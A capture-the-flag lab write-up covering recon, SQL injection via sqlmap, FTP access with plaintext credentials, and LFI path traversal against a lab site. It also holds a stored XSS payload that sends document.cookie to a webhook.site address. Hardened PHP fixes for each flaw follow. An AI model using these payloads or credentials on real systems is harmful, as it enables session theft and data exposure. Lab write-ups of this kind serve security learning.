# Hackwekend - Session 1 (Pentester web - Security Lab)

###### tags: `ctf` `network` `exploits` `vulnerable` `top10owasp`

Hi, I am back with the university CTF series, LOL. Sorry for being late; it took me two weeks to solve all the flags of the website. So let's get into it and try to learn something new.

## 1. Recon Progressing

- In this step I do some recon on how the website works: what tech it uses, which ports are open, and whether there are any subdomains, LOL.
- Start by searching the website's directories with dirsearch, one of the best choices for directory enumeration. It runs with Python; download it through this [Link](https://github.com/maurosoria/dirsearch).
  ![](https://i.imgur.com/ycjbt6T.png)
- The dirsearch result typically turns up cool stuff:
  ![](https://i.imgur.com/qV6pwNi.png)
- So cool, we find a hidden path, `/.gitignore`, with a 200 response.
- That is a good signal on recon, so try `ctf.wheelife.net/.gitignore`.
  ![](https://i.imgur.com/fMK2Stj.png)
- Yup, we find flag 1 in the hidden path, cool stuff of the challenge.

> Flag1: Flag{ozIA3akOT7NcAwTa}

- On to the second step of recon: using nmap to check which ports are open.
  ![](https://i.imgur.com/HNYf6MA.png)
- So we know this website has two ports open: 21 (maybe helpful in a later step) and, of course, 80.
- Situation: can we predict why **port 21 is open**? :smiling_face_with_smiling_eyes_and_hand_covering_mouth:
- In the next step we need to check the website's technology: programming language, framework, server, OS, ... blah blah.
  ![](https://i.imgur.com/DdfLYrX.png)
- It is a very simple setup: the website is written in PHP and hosted on Apache2 on Ubuntu, LOL.
- That spoils it for us: how can we reach deep into the website? Knowing the whole tech stack of a website has high impact.

### Conclusion

- Two ports open: 21 and 80
- Written in PHP and hosted on Apache2 with Ubuntu OS
- Got flag 1 on a hidden route

## 2. Exploit Progressing + GG everything for progressing

### SQLi Exploit

- Looking around, we can see `get_wards.php`, which is really strange and may be vulnerable to SQLi: `http://ctf.wheelife.net/get_wards.php?district_id=1`. So try an easy test payload like `' OR 1=1--`.
- It clearly has SQLi: `http://ctf.wheelife.net/get_wards.php?district_id=1%20OR%201=1--%20-`
  ![](https://i.imgur.com/wWbbjsO.png)
- One thing we know is to use sqlmap, a powerful tool for scanning SQL injection, to dump the whole database and get all its tables, with the command `sqlmap -u ctf.wheelife.net/get_wards.php?district_id=1 --dump`.
  ![](https://i.imgur.com/Uulbdye.png)
- With that command we get the config table, which is really helpful: it holds the second flag and the FTP login information.
- Secondly, we know the password on the login form, but we would need to know how it is hashed (MD4, MD5 or SHA-256); one thing, though: I don't think it is helpful.
  ![](https://i.imgur.com/uWC1qM2.png)
- There is also a table like `comment`, which links to `comment.php`.
  ![](https://i.imgur.com/5ycZjVn.png)
- And yup, I have the second flag, and I can reach the FTP server to see what it has :smiley:

> Flag 2: Flag{1NecwrX6WaeCHJmx}

### FTP exploit

- Basically, every PC has an FTP client and you just need to connect to the service, so try it like SSH: `ftp ctf.wheelife.net`.
- Type the username and password and log in with username `ftpuser` and password `Ubuntu_2022_ftpuser`.
- Once logged in, run `more files/.flag` (we scanned the ports and saw that port 21 is open).

> Flag 3: Flag{AMFVGVLzhHBNXMAb}

### XSS exploit

- As I know from the sqlmap output, the `comment` table is loaded somewhere, and with the hint it can be used to steal cookies.
  ![](https://i.imgur.com/WYaciGk.png)
- On that page we can see two inputs, Name and Content, but they only give reflected XSS. One thing to focus on is the IP, which can be stored XSS: put the payload in the `X-Forwarded-For` request header and it returns the cookie.
> `<script>fetch('https://webhook.site/4a85e2af-96a5-454fbd93-fbc0065daa8d/' + document.cookie)</script>`

- Result: `flag=Flag{/xpeihQtrM+4HRBI}`
- So we get flag 4, and yup, it is really cool stuff when we get that.

> Flag 4: Flag{/xpeihQtrM+4HRBI}

### LFI exploit

- With the cookie above I can reach the admin page endpoint by changing the cookie with anything like `Burpsuite` or `Firefox`; follow it to the end and we get a surprise :smiling_face_with_smiling_eyes_and_hand_covering_mouth:
  ![](https://i.imgur.com/cR2Ttyp.png)
- It has some routes that go elsewhere, but focus on the image: the way it loads is very strange, and there may be LFI there.
  ![](https://i.imgur.com/UdJCy42.png)
- Trying it in the Repeater tab of `burpsuite`, I can see it loads file content from the web folder, so we can get the image, and I know it has LFI.
  ![](https://i.imgur.com/lWcEwdt.png)
- Try a basic payload like `file=../../../etc/passwd` and we get what we want. **PoC of the LFI exploit:**
  ![](https://i.imgur.com/EW3Hf8N.png)
- GG time: I know the website is written in PHP and hosted on Apache2, so something I got from this page can lead me to the source code: [Solution to host LAMP web](https://www.digitalocean.com/community/tutorials/how-to-install-linux-apache-mysql-php-lamp-stack-on-ubuntu-20-04)
  ![](https://i.imgur.com/UizXkCO.png)
- That gave me an idea: we can try payloads like

> `file=../../../var/www/wheelife/index.php` - 500 ERR
>
> `file=../../../var/www/ctf/index.php` - 200

- So we get the source, which leads to a super strange route, `/page.php`.
  ![](https://i.imgur.com/xDSzTk7.png)
- The important line: **`$ini = parse_ini_file('web.conf');`**. That tells me a `web.conf` file exists, so I read it and find a real surprise.
  ![](https://i.imgur.com/IKbOBKF.png)
- There is a subdomain, `api.wheelife.net`, which has a `flag.php`, but it is just a decoy :smile:; it gives me nothing, since the secret sits in the `flag.php` file itself, which I can't see from there.
- So read `file=../../../var/www/api/flag.php`, and yup, the secret is spoiled.
  ![](https://i.imgur.com/ALo4ua7.png)

> Flag 5: Flag{J3Gzrh18YP9kUig3}

### Conclusion

> The CTF is quite fun, but sometimes we wait too long to get a result, or just find the endpoint by guessing. Still, it has reasonable time consumption and not much time is needed to level up :smiley:. I was happy to do it, and it gives more chances to upgrade to a higher level :100:. Hoping you get some really cool stuff from this WU. Happy hacking !!!
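For the SQLi section above, this is an added example (not the challenge's own code) of how `get_wards.php` could look up wards for `district_id` without the injection; the real query is not on the page, so the vulnerable form, the table name `wards` and the database account are assumptions:

```php
<?php
// Added example, not the challenge's own code: how get_wards.php could look up the wards
// of a district without the injection in the write-up. The real query is not on the page,
// so the vulnerable form below is an assumption about how ?district_id= was used.
declare(strict_types=1);

// Assumed vulnerable form: district_id is concatenated into the SQL, so a value such as
// "1 OR 1=1-- -" changes the WHERE clause and lets sqlmap walk the whole database.
function wards_for_district_unsafe(PDO $pdo, string $districtId): array
{
    $sql = 'SELECT id, name FROM wards WHERE district_id = ' . $districtId;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened form: the parameter must be a positive integer, and it is bound as a typed
// placeholder, so the value can never alter the statement that reaches MySQL.
function wards_for_district(PDO $pdo, string $districtId): array
{
    $id = filter_var($districtId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('district_id must be a positive integer');
    }
    $stmt = $pdo->prepare('SELECT id, name FROM wards WHERE district_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Connection: server-side prepares (no emulation) and a read-only account that can see the
// ward tables only. The config table holding the FTP credentials that sqlmap dumped should
// not be readable by the web application's database user at all.
$pdo = new PDO(
    'mysql:host=127.0.0.1;dbname=ctf;charset=utf8mb4',
    'wards_ro',                                   // assumed least-privilege account
    getenv('WARDS_DB_PASSWORD') ?: '',
    [PDO::ATTR_EMULATE_PREPARES => false, PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]
);

try {
    $wards = wards_for_district($pdo, $_GET['district_id'] ?? '');
} catch (InvalidArgumentException $e) {
    http_response_code(400);                      // "1 OR 1=1-- -" never reaches the database
    exit;
}
header('Content-Type: application/json');
echo json_encode($wards);
```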
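For the XSS section above, this is an added example (not the challenge's own code) of how `comment.php` could record the commenter's IP without the stored XSS that the `X-Forwarded-For` header triggered, and why the cookie should not have been readable from `document.cookie` in the first place; the real `comment.php` is not on the page, so the table and column names and the proxy address are assumptions:

```php
<?php
// Added example, not the challenge's own code: how comment.php could record the visitor's
// IP without the stored XSS that the write-up triggers through X-Forwarded-For. The real
// comment.php is not on the page; the table and column names below are assumed.
declare(strict_types=1);

// The flag was read with document.cookie, so the session cookie must be HttpOnly; a script
// that does run then still cannot read it.
session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
session_start();

// X-Forwarded-For is client-supplied text. It is only meaningful when the request really came
// through a proxy we operate, and even then only the hop that proxy appended, validated as an IP.
function client_ip(array $server, array $trustedProxies): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (!in_array($remote, $trustedProxies, true)) {
        return $remote;                                    // no proxy in front: ignore the header
    }
    $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? ''));
    $candidate = end($hops);
    return filter_var($candidate, FILTER_VALIDATE_IP) === false ? $remote : $candidate;
}

function store_comment(PDO $pdo, string $name, string $content, string $ip): void
{
    $stmt = $pdo->prepare('INSERT INTO comment (name, content, ip) VALUES (:n, :c, :ip)');
    $stmt->execute([':n' => $name, ':c' => $content, ':ip' => $ip]);
}

// Output encoding is the actual XSS fix: every stored field, the IP included, is escaped at
// render time, so markup that somehow reached the table is displayed as text, not executed.
function render_comment(array $row): string
{
    $e = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<li>' . $e($row['name']) . ' (' . $e($row['ip']) . '): ' . $e($row['content']) . '</li>';
}

// Constructed request: the header value is not an IP, so client_ip() falls back to REMOTE_ADDR,
// and render_comment() would have neutralised it anyway.
$server = [
    'REMOTE_ADDR' => '10.0.0.5',                           // assumed address of our own proxy
    'HTTP_X_FORWARDED_FOR' => '<script>alert(document.cookie)</script>',
];
$ip = client_ip($server, ['10.0.0.5']);                   // "10.0.0.5"
echo render_comment(['name' => 'anon', 'content' => 'hi', 'ip' => $ip]), PHP_EOL;
```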
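For the LFI section above, this is an added example (not the challenge's own code, PHP 8+) of an image loader for the admin page's `file=` parameter that cannot be steered to `/etc/passwd`, `index.php`, `web.conf` or `/var/www/api/flag.php`; the original loader is not on the page, so the image directory and the allowed extensions are assumptions:

```php
<?php
// Added example, not the challenge's own code: a file loader for the admin page's image
// route that cannot be steered to /etc/passwd, index.php, web.conf or /var/www/api/flag.php
// the way the write-up's ?file=../../../ payloads do. The original loader is not on the
// page; "file" is the only parameter name it gives. Requires PHP 8 (str_starts_with).
declare(strict_types=1);

const IMAGE_DIR = '/var/www/ctf/images';                   // assumed location
const ALLOWED_EXT = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'gif' => 'image/gif'];

// Returns the absolute path of an image inside IMAGE_DIR, or null for anything else.
function resolve_image(string $requested, string $baseDir = IMAGE_DIR): ?string
{
    // 1. Only a bare file name is ever accepted: no slashes, no "..", no NUL bytes.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.([A-Za-z0-9]+)\z/', $requested, $m)) {
        return null;
    }
    $ext = strtolower($m[1]);
    if (!isset(ALLOWED_EXT[$ext])) {
        return null;                                       // .php, .conf and dotfiles are out
    }
    // 2. Resolve symlinks and confirm the result still lives under the image directory.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return is_file($path) ? $path : null;
}

function serve_image(string $requested): void
{
    $path = resolve_image($requested);
    if ($path === null) {
        http_response_code(404);                           // same answer for traversal and for a typo
        return;
    }
    header('Content-Type: ' . ALLOWED_EXT[strtolower(pathinfo($path, PATHINFO_EXTENSION))]);
    header('X-Content-Type-Options: nosniff');
    readfile($path);                                       // never include(): an image is data, not code
}

// Secrets such as web.conf belong outside the document root, so even a bypass of the loader
// cannot read them: parse_ini_file('/etc/wheelife/web.conf') rather than a file next to page.php.
serve_image($_GET['file'] ?? '');
```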